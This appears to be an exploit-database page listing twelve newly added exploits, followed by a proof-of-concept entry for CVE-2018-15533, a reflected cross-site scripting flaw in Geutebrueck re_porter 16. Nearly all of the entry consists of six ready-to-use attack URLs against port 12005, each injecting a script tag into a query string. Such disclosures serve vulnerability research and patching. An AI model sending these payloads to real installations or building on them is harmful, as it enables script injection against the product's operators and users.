
12 changes to exploits/shellcodes Textpad 7.6.4 - Denial Of Service (PoC) UltraISO 9.7.1.3519 - Denial Of Service (PoC) Easyboot 6.6.0 - Denial Of Service (PoC) Softdisk 3.0.3 - Denial Of Service (PoC) Soroush IM Desktop App 0.17.0 - Authentication Bypass Project64 2.3.2 - Buffer Overflow (SEH) Ghostscript - Multiple Vulnerabilities Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation OpenSSH 2.3 < 7.4 - Username Enumeration (PoC) OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) Geutebrueck re_porter 7.8.974.20 - Credential Disclosure ZyXEL VMG3312-B10B - Cross-Site Scripting KingMedia 4.1 - Remote Code Execution Geutebrueck re_porter 16 - Cross-Site Scripting
20 lines
No EOL
854 B
Text
20 lines
No EOL
854 B
Text
# Exploit Title: Geutebrueck re_porter 16 - Cross-Site Scripting
|
|
# Date: 2018-08-03
|
|
# Exploit Author: Kamil Suska
|
|
# Vendor: https://www.geutebrueck.com/en_US.html
|
|
# Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html
|
|
# Version: prior 7.8.974.20
|
|
# CVE-2018-15533
|
|
|
|
# Attack Vectors
|
|
http://example.com:12005/modifychannel/exec?vv9r7<script>alert(1)</script>auubw=1
|
|
|
|
http://example.com:12005/images/IOMemoryPool.png?ebmf6<script>alert(1)</script>pmsih=1
|
|
|
|
http://example.com:12005/images/Statistics.png?q3dlx<script>alert(1)</script>zjvdw=1
|
|
|
|
http://example.com:12005/images/GLIBBackground.jpg?itfvf<script>alert(1)</script>irvnl=1
|
|
|
|
http://example.com:12005/images/MainMemoryPool.png?bzu69<script>alert(1)</script>m2hhj=1
|
|
|
|
http://example.com:12005/images/ProcessMemory.png?f4d7j<script>alert(1)</script>m5by3= |